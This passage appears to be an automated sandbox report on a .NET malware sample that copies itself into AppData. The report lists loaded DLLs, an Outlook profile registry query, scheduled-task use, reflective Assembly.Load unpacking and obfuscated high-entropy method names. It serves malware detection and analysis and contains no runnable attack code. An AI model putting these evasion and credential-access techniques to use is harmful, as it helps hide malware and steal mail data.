                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: rasapi32.dll
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: rasman.dll
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: rtutils.dll
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: secur32.dll
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: schannel.dll
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: 2i3Lj7a8Gk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: 2i3Lj7a8Gk.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: 2i3Lj7a8Gk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: OQhQ.pdb source: 2i3Lj7a8Gk.exe, lyNyKapwZJLKnn.exe.0.dr
                  Source: Binary string: OQhQ.pdbSHA256 source: 2i3Lj7a8Gk.exe, lyNyKapwZJLKnn.exe.0.dr

                  Data Obfuscation

                  barindex
                  .NET source code contains potential unpacker
                  Source: 0.2.2i3Lj7a8Gk.exe.3b11ea0.4.raw.unpack, MainForm.cs.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.2i3Lj7a8Gk.exe.3af9c80.1.raw.unpack, MainForm.cs.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.2i3Lj7a8Gk.exe.45573e0.3.raw.unpack, DuMROSxCmqfhBtrcL3.cs.Net Code: yQoVNRtol6 System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.2i3Lj7a8Gk.exe.7360000.5.raw.unpack, DuMROSxCmqfhBtrcL3.cs.Net Code: yQoVNRtol6 System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.2i3Lj7a8Gk.exe.45dce00.2.raw.unpack, DuMROSxCmqfhBtrcL3.cs.Net Code: yQoVNRtol6 System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.2i3Lj7a8Gk.exe.77b0000.6.raw.unpack, MainForm.cs.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
                  Source: 2i3Lj7a8Gk.exeStatic PE information: 0xD4D79B6B [Fri Feb 26 20:36:59 2083 UTC]
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 0_2_0110DB28 pushad ; retf 0_2_0110DB29
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 0_2_06FDD010 pushad ; ret 0_2_06FDD011
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 0_2_06FDD012 push eax; ret 0_2_06FDD019
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 0_2_06FD08C5 push es; ret 0_2_06FD08DC
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 0_2_070918B4 push dword ptr [edx+ebp*2-75h]; iretd 0_2_070918BF
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CF87E7 pushad ; iretd 6_2_06CF87EA
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CF878F push esi; iretd 6_2_06CF8792
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CF875F push edx; iretd 6_2_06CF8762
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CF8753 push edx; iretd 6_2_06CF875E
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CF8767 push bx; iretd 6_2_06CF876E
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CF8765 push edx; iretd 6_2_06CF8766
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CF877B push ebx; iretd 6_2_06CF877E
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CF9241 push es; ret 6_2_06CF9244
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CF8803 push 688706CFh; iretd 6_2_06CF8816
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeCode function: 7_2_0173DB28 pushad ; retf 7_2_0173DB29
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeCode function: 13_2_01149C30 push esp; retf 011Dh13_2_01149D55
                  Source: 2i3Lj7a8Gk.exeStatic PE information: section name: .text entropy: 7.700449083739961
                  Source: lyNyKapwZJLKnn.exe.0.drStatic PE information: section name: .text entropy: 7.700449083739961
                  Source: 0.2.2i3Lj7a8Gk.exe.45573e0.3.raw.unpack, KexrhkrD0V06LqILWv.csHigh entropy of concatenated method names: 'PB3uQrUN5s', 'ESAuxQmfyf', 'Ft8udpPwvN', 'SwEuAxm5VX', 'YjpugFHsL3', 'dOduMOR807', 'AYfu2w9ufE', 'rnUuZJiMbH', 'KDquXxwMxg', 'djvuoYLc4G'
                  Source: 0.2.2i3Lj7a8Gk.exe.45573e0.3.raw.unpack, aSN3GuMwIV9gTOVQcT.csHigh entropy of concatenated method names: 'XJGqRZ5gUq9XBaX2Ah6', 'aKdxeO5GsmH2f3jQtWL', 'HsSjF8aPw4', 'IG6jmVBUWc', 'w6ejUhrsjC', 'Oilbp05npgaCGmmIexk', 'oegjw85h56OM7JDTVJ2'
                  Source: 0.2.2i3Lj7a8Gk.exe.45573e0.3.raw.unpack, U2rA3WVWalOxnTMMV4.csHigh entropy of concatenated method names: 'NOdPZFMp9G', 'XoTPoXLhhf', 'N0nFwaNs98', 'QtsFsR70x2', 'sPsPcy0igF', 'tEqPiwS57V', 'NF3P11vIJX', 'u82PQtf3aQ', 'CbaPxWYubw', 'chnPdWUTXZ'
                  Source: 0.2.2i3Lj7a8Gk.exe.45573e0.3.raw.unpack, IKMnJMAGMWjJkB2Xug.csHigh entropy of concatenated method names: 'Dispose', 'zJwsX1Kj9N', 'jirhtt9TSQ', 'QJAqq28gy2', 'zeXsoGfp2e', 'Q3Psz19jtL', 'ProcessDialogKey', 'fuChwZhUJ9', 'jGchsIPPDd', 'i9fhhnYZI4'
                  Source: 0.2.2i3Lj7a8Gk.exe.45573e0.3.raw.unpack, eo4T2X1Dv3TgKlbxU1.csHigh entropy of concatenated method names: 'kbTWyTDRh7', 'hA1WfXdegi', 'YbhWIDDBSt', 'hJUWtmmsHU', 'x2bW7LPwGa', 'uQDWBqG8PQ', 'qCCWH8r18v', 'ggQWYOXkIG', 'uHcWJJYGUp', 'KKUWcCsuuL'
                  Source: 0.2.2i3Lj7a8Gk.exe.45573e0.3.raw.unpack, Lonn3j0q0AQi6YTE3j.csHigh entropy of concatenated method names: 'fxkFIrHfoO', 'YTSFt0yp7a', 'ksEFlxFYNG', 'OErF7hKg0c', 'YtYFQCqUqA', 'vATFBpiYj7', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.2i3Lj7a8Gk.exe.45573e0.3.raw.unpack, FIkKZKJloOjyigcxKH.csHigh entropy of concatenated method names: 'UpWFn3gS7S', 'FgoFu2YhNL', 'vFQFEClmFU', 'nEwFbm2T54', 'iYWFjR5AQG', 'ousFCNDJNJ', 'qPeF47R2Vy', 'KFHF6RC82H', 'a4EFS8OitU', 'VWPF3joA2F'
                  Source: 0.2.2i3Lj7a8Gk.exe.45573e0.3.raw.unpack, Qq1obo5AW8WT5RBnbv.csHigh entropy of concatenated method names: 'Efgb07TkVK', 'V9kbkfB1Kg', 'AJIElkfQ8m', 'OV7E7pcI3O', 'B90EBhrHsZ', 'iOgEewLNV5', 'WloEHpbhak', 'y8kEYBTAWd', 'vGSEK1CaZo', 'jvVEJ8MfRi'
                  Source: 0.2.2i3Lj7a8Gk.exe.45573e0.3.raw.unpack, CgsZrxZ5bJs1isOAsW.csHigh entropy of concatenated method names: 'UWPmsd4QMr', 'RnQmLNauKL', 'egDmVPQ6eQ', 'k39mnkhrH2', 'gVtmuYhBbi', 'iEgmb6FgUY', 'AiJmjZAgm1', 'NyTF2H4ckQ', 'LHBFZmcP6p', 'pyGFXSUxER'
                  Source: 0.2.2i3Lj7a8Gk.exe.45573e0.3.raw.unpack, SE8ir6ghUdmEJkMdDS.csHigh entropy of concatenated method names: 'i5ZPSuAxEP', 'nTXP3twPni', 'ToString', 'y1HPneMVfI', 'NgaPuxSA5x', 'F6tPEVQ2SG', 'VsiPbtmcnM', 'trpPjWf00U', 'uDyPC8g9N1', 'BraP4sNq6u'
                  Source: 0.2.2i3Lj7a8Gk.exe.45573e0.3.raw.unpack, DuMROSxCmqfhBtrcL3.csHigh entropy of concatenated method names: 'yOMLTchpe7', 'WUGLnYiYoA', 'W37LusktDV', 'nAOLERtdAB', 'NOtLbPD8V1', 'a68LjAsYRL', 'HKfLCryrmp', 'Dg9L4lSPIH', 'VSTL65Hk8b', 'GgLLSF9iuC'
                  Source: 0.2.2i3Lj7a8Gk.exe.45573e0.3.raw.unpack, I8KkSGhDf7BGedS1Qv.csHigh entropy of concatenated method names: 'YOQEaScGNA', 'FHjEGyIy69', 'P3TEyGNNwa', 'zS9EfFPqPh', 'CmbERlnq2v', 'rmNEO8dEDR', 'jowEPurN3f', 'xP0EFmoVC3', 'tAaEm6q92H', 'qXLEURISO7'
                  Source: 0.2.2i3Lj7a8Gk.exe.45573e0.3.raw.unpack, ecKDheHH0uffYM2Fi6g.csHigh entropy of concatenated method names: 'ToString', 'nCiULlRQEW', 'JtsUVdJmyo', 'D2uUTduAQw', 'SRsUn6kvnT', 'suQUujrSfL', 'z92UE7bTxV', 'jcVUbTGwvP', 'pXB0n1aLvsIBy5wpKXx', 'TC8ga4aKbPMkl7m2aI3'
                  Source: 0.2.2i3Lj7a8Gk.exe.45573e0.3.raw.unpack, IsdtIxHB8KRIqEfRXKj.csHigh entropy of concatenated method names: 'GiHmrYCSxd', 'viVm8cae9y', 'RV2mN8JTnp', 'YBsmaiJgMm', 'ggem0RM16h', 'uFYmGoni9b', 'jDkmkfAx1u', 'U4Imy04y5y', 'cZ5mf9jI5t', 'yCqmvVeuBy'
                  Source: 0.2.2i3Lj7a8Gk.exe.45573e0.3.raw.unpack, o1qUIqLK21d9xCwImS.csHigh entropy of concatenated method names: 'vl0jTDoOen', 'dutjuEMCfE', 'dlhjbDukj9', 'SXIjCJwB5h', 'BsSj4xTS9B', 'NEubgfo2Pk', 'XidbMFGR36', 'xvOb2QTN7f', 'svHbZSKI9O', 'ExmbXCWkky'
                  Source: 0.2.2i3Lj7a8Gk.exe.45573e0.3.raw.unpack, gByks8SDMER85a92MA.csHigh entropy of concatenated method names: 'OwINxex6d', 'Ptdayw1cN', 'j8LG28fbQ', 'upDkMtIpU', 'EYLfUR9Z8', 'zamv3OM1G', 'XPe8lZAqgTFKdHXY4B', 'G5GgMxRJHM3G6iymMR', 'MWV11vH7X2200V9Y0E', 'jTqF4E6fA'
                  Source: 0.2.2i3Lj7a8Gk.exe.45573e0.3.raw.unpack, h50wgh6LF9bYD0ikjA.csHigh entropy of concatenated method names: 'mwKCrhHvp4', 'Kq4C8T0owC', 'uCuCN2B2OJ', 'O7mCajJEXh', 'j6RC0eZXFJ', 'CAbCG6kwHs', 'k9WCk11vQJ', 'uGjCy69U4i', 'F96CfP8rPK', 'LHvCvogTlg'
                  Source: 0.2.2i3Lj7a8Gk.exe.45573e0.3.raw.unpack, PKeJNeHl4Ackfff2Coj.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'glgUQ9BWxx', 'dyJUxsikDy', 'kH8UdJdeTV', 'jZaUAJPspT', 'HdWUgysWDt', 'c1nUMAMH27', 'sPGU2IjCOY'
                  Source: 0.2.2i3Lj7a8Gk.exe.45573e0.3.raw.unpack, wOtoBA4wweaIJmt93j.csHigh entropy of concatenated method names: 'RsmCn1tQkg', 'yeNCEyCYfj', 'wW9CjSjB6g', 'LVwjoyeZVZ', 'oA6jzs0shx', 'W0XCwj5YUT', 'DIcCsriERW', 'aANChQbx9O', 'ItQCLZxknk', 'mA2CV915AA'
                  Source: 0.2.2i3Lj7a8Gk.exe.45573e0.3.raw.unpack, D3p30FN1f5pTIN89YF.csHigh entropy of concatenated method names: 'mEYsCWCQH2', 'ehbs4CeB8K', 'XBBsSdcBqB', 'fK0s3N03jZ', 'HQnsRGdDRG', 'S9XsO4qc0a', 'udnwfs0wC0KHgRaGVG', 'VTiteiFRcgynPZ21Dn', 'GhDssHi5ka', 'rhJsLi99uL'
                  Source: 0.2.2i3Lj7a8Gk.exe.7360000.5.raw.unpack, KexrhkrD0V06LqILWv.csHigh entropy of concatenated method names: 'PB3uQrUN5s', 'ESAuxQmfyf', 'Ft8udpPwvN', 'SwEuAxm5VX', 'YjpugFHsL3', 'dOduMOR807', 'AYfu2w9ufE', 'rnUuZJiMbH', 'KDquXxwMxg', 'djvuoYLc4G'
                  Source: 0.2.2i3Lj7a8Gk.exe.7360000.5.raw.unpack, aSN3GuMwIV9gTOVQcT.csHigh entropy of concatenated method names: 'XJGqRZ5gUq9XBaX2Ah6', 'aKdxeO5GsmH2f3jQtWL', 'HsSjF8aPw4', 'IG6jmVBUWc', 'w6ejUhrsjC', 'Oilbp05npgaCGmmIexk', 'oegjw85h56OM7JDTVJ2'
                  Source: 0.2.2i3Lj7a8Gk.exe.7360000.5.raw.unpack, U2rA3WVWalOxnTMMV4.csHigh entropy of concatenated method names: 'NOdPZFMp9G', 'XoTPoXLhhf', 'N0nFwaNs98', 'QtsFsR70x2', 'sPsPcy0igF', 'tEqPiwS57V', 'NF3P11vIJX', 'u82PQtf3aQ', 'CbaPxWYubw', 'chnPdWUTXZ'
                  Source: 0.2.2i3Lj7a8Gk.exe.7360000.5.raw.unpack, IKMnJMAGMWjJkB2Xug.csHigh entropy of concatenated method names: 'Dispose', 'zJwsX1Kj9N', 'jirhtt9TSQ', 'QJAqq28gy2', 'zeXsoGfp2e', 'Q3Psz19jtL', 'ProcessDialogKey', 'fuChwZhUJ9', 'jGchsIPPDd', 'i9fhhnYZI4'
                  Source: 0.2.2i3Lj7a8Gk.exe.7360000.5.raw.unpack, eo4T2X1Dv3TgKlbxU1.csHigh entropy of concatenated method names: 'kbTWyTDRh7', 'hA1WfXdegi', 'YbhWIDDBSt', 'hJUWtmmsHU', 'x2bW7LPwGa', 'uQDWBqG8PQ', 'qCCWH8r18v', 'ggQWYOXkIG', 'uHcWJJYGUp', 'KKUWcCsuuL'
                  Source: 0.2.2i3Lj7a8Gk.exe.7360000.5.raw.unpack, Lonn3j0q0AQi6YTE3j.csHigh entropy of concatenated method names: 'fxkFIrHfoO', 'YTSFt0yp7a', 'ksEFlxFYNG', 'OErF7hKg0c', 'YtYFQCqUqA', 'vATFBpiYj7', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.2i3Lj7a8Gk.exe.7360000.5.raw.unpack, FIkKZKJloOjyigcxKH.csHigh entropy of concatenated method names: 'UpWFn3gS7S', 'FgoFu2YhNL', 'vFQFEClmFU', 'nEwFbm2T54', 'iYWFjR5AQG', 'ousFCNDJNJ', 'qPeF47R2Vy', 'KFHF6RC82H', 'a4EFS8OitU', 'VWPF3joA2F'
                  Source: 0.2.2i3Lj7a8Gk.exe.7360000.5.raw.unpack, Qq1obo5AW8WT5RBnbv.csHigh entropy of concatenated method names: 'Efgb07TkVK', 'V9kbkfB1Kg', 'AJIElkfQ8m', 'OV7E7pcI3O', 'B90EBhrHsZ', 'iOgEewLNV5', 'WloEHpbhak', 'y8kEYBTAWd', 'vGSEK1CaZo', 'jvVEJ8MfRi'
                  Source: 0.2.2i3Lj7a8Gk.exe.7360000.5.raw.unpack, CgsZrxZ5bJs1isOAsW.csHigh entropy of concatenated method names: 'UWPmsd4QMr', 'RnQmLNauKL', 'egDmVPQ6eQ', 'k39mnkhrH2', 'gVtmuYhBbi', 'iEgmb6FgUY', 'AiJmjZAgm1', 'NyTF2H4ckQ', 'LHBFZmcP6p', 'pyGFXSUxER'
                  Source: 0.2.2i3Lj7a8Gk.exe.7360000.5.raw.unpack, SE8ir6ghUdmEJkMdDS.csHigh entropy of concatenated method names: 'i5ZPSuAxEP', 'nTXP3twPni', 'ToString', 'y1HPneMVfI', 'NgaPuxSA5x', 'F6tPEVQ2SG', 'VsiPbtmcnM', 'trpPjWf00U', 'uDyPC8g9N1', 'BraP4sNq6u'
                  Source: 0.2.2i3Lj7a8Gk.exe.7360000.5.raw.unpack, DuMROSxCmqfhBtrcL3.csHigh entropy of concatenated method names: 'yOMLTchpe7', 'WUGLnYiYoA', 'W37LusktDV', 'nAOLERtdAB', 'NOtLbPD8V1', 'a68LjAsYRL', 'HKfLCryrmp', 'Dg9L4lSPIH', 'VSTL65Hk8b', 'GgLLSF9iuC'
                  Source: 0.2.2i3Lj7a8Gk.exe.7360000.5.raw.unpack, I8KkSGhDf7BGedS1Qv.csHigh entropy of concatenated method names: 'YOQEaScGNA', 'FHjEGyIy69', 'P3TEyGNNwa', 'zS9EfFPqPh', 'CmbERlnq2v', 'rmNEO8dEDR', 'jowEPurN3f', 'xP0EFmoVC3', 'tAaEm6q92H', 'qXLEURISO7'
                  Source: 0.2.2i3Lj7a8Gk.exe.7360000.5.raw.unpack, ecKDheHH0uffYM2Fi6g.csHigh entropy of concatenated method names: 'ToString', 'nCiULlRQEW', 'JtsUVdJmyo', 'D2uUTduAQw', 'SRsUn6kvnT', 'suQUujrSfL', 'z92UE7bTxV', 'jcVUbTGwvP', 'pXB0n1aLvsIBy5wpKXx', 'TC8ga4aKbPMkl7m2aI3'
                  Source: 0.2.2i3Lj7a8Gk.exe.7360000.5.raw.unpack, IsdtIxHB8KRIqEfRXKj.csHigh entropy of concatenated method names: 'GiHmrYCSxd', 'viVm8cae9y', 'RV2mN8JTnp', 'YBsmaiJgMm', 'ggem0RM16h', 'uFYmGoni9b', 'jDkmkfAx1u', 'U4Imy04y5y', 'cZ5mf9jI5t', 'yCqmvVeuBy'
                  Source: 0.2.2i3Lj7a8Gk.exe.7360000.5.raw.unpack, o1qUIqLK21d9xCwImS.csHigh entropy of concatenated method names: 'vl0jTDoOen', 'dutjuEMCfE', 'dlhjbDukj9', 'SXIjCJwB5h', 'BsSj4xTS9B', 'NEubgfo2Pk', 'XidbMFGR36', 'xvOb2QTN7f', 'svHbZSKI9O', 'ExmbXCWkky'
                  Source: 0.2.2i3Lj7a8Gk.exe.7360000.5.raw.unpack, gByks8SDMER85a92MA.csHigh entropy of concatenated method names: 'OwINxex6d', 'Ptdayw1cN', 'j8LG28fbQ', 'upDkMtIpU', 'EYLfUR9Z8', 'zamv3OM1G', 'XPe8lZAqgTFKdHXY4B', 'G5GgMxRJHM3G6iymMR', 'MWV11vH7X2200V9Y0E', 'jTqF4E6fA'
                  Source: 0.2.2i3Lj7a8Gk.exe.7360000.5.raw.unpack, h50wgh6LF9bYD0ikjA.csHigh entropy of concatenated method names: 'mwKCrhHvp4', 'Kq4C8T0owC', 'uCuCN2B2OJ', 'O7mCajJEXh', 'j6RC0eZXFJ', 'CAbCG6kwHs', 'k9WCk11vQJ', 'uGjCy69U4i', 'F96CfP8rPK', 'LHvCvogTlg'
                  Source: 0.2.2i3Lj7a8Gk.exe.7360000.5.raw.unpack, PKeJNeHl4Ackfff2Coj.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'glgUQ9BWxx', 'dyJUxsikDy', 'kH8UdJdeTV', 'jZaUAJPspT', 'HdWUgysWDt', 'c1nUMAMH27', 'sPGU2IjCOY'
                  Source: 0.2.2i3Lj7a8Gk.exe.7360000.5.raw.unpack, wOtoBA4wweaIJmt93j.csHigh entropy of concatenated method names: 'RsmCn1tQkg', 'yeNCEyCYfj', 'wW9CjSjB6g', 'LVwjoyeZVZ', 'oA6jzs0shx', 'W0XCwj5YUT', 'DIcCsriERW', 'aANChQbx9O', 'ItQCLZxknk', 'mA2CV915AA'
                  Source: 0.2.2i3Lj7a8Gk.exe.7360000.5.raw.unpack, D3p30FN1f5pTIN89YF.csHigh entropy of concatenated method names: 'mEYsCWCQH2', 'ehbs4CeB8K', 'XBBsSdcBqB', 'fK0s3N03jZ', 'HQnsRGdDRG', 'S9XsO4qc0a', 'udnwfs0wC0KHgRaGVG', 'VTiteiFRcgynPZ21Dn', 'GhDssHi5ka', 'rhJsLi99uL'
                  Source: 0.2.2i3Lj7a8Gk.exe.45dce00.2.raw.unpack, KexrhkrD0V06LqILWv.csHigh entropy of concatenated method names: 'PB3uQrUN5s', 'ESAuxQmfyf', 'Ft8udpPwvN', 'SwEuAxm5VX', 'YjpugFHsL3', 'dOduMOR807', 'AYfu2w9ufE', 'rnUuZJiMbH', 'KDquXxwMxg', 'djvuoYLc4G'
                  Source: 0.2.2i3Lj7a8Gk.exe.45dce00.2.raw.unpack, aSN3GuMwIV9gTOVQcT.csHigh entropy of concatenated method names: 'XJGqRZ5gUq9XBaX2Ah6', 'aKdxeO5GsmH2f3jQtWL', 'HsSjF8aPw4', 'IG6jmVBUWc', 'w6ejUhrsjC', 'Oilbp05npgaCGmmIexk', 'oegjw85h56OM7JDTVJ2'
                  Source: 0.2.2i3Lj7a8Gk.exe.45dce00.2.raw.unpack, U2rA3WVWalOxnTMMV4.csHigh entropy of concatenated method names: 'NOdPZFMp9G', 'XoTPoXLhhf', 'N0nFwaNs98', 'QtsFsR70x2', 'sPsPcy0igF', 'tEqPiwS57V', 'NF3P11vIJX', 'u82PQtf3aQ', 'CbaPxWYubw', 'chnPdWUTXZ'
                  Source: 0.2.2i3Lj7a8Gk.exe.45dce00.2.raw.unpack, IKMnJMAGMWjJkB2Xug.csHigh entropy of concatenated method names: 'Dispose', 'zJwsX1Kj9N', 'jirhtt9TSQ', 'QJAqq28gy2', 'zeXsoGfp2e', 'Q3Psz19jtL', 'ProcessDialogKey', 'fuChwZhUJ9', 'jGchsIPPDd', 'i9fhhnYZI4'
                  Source: 0.2.2i3Lj7a8Gk.exe.45dce00.2.raw.unpack, eo4T2X1Dv3TgKlbxU1.csHigh entropy of concatenated method names: 'kbTWyTDRh7', 'hA1WfXdegi', 'YbhWIDDBSt', 'hJUWtmmsHU', 'x2bW7LPwGa', 'uQDWBqG8PQ', 'qCCWH8r18v', 'ggQWYOXkIG', 'uHcWJJYGUp', 'KKUWcCsuuL'
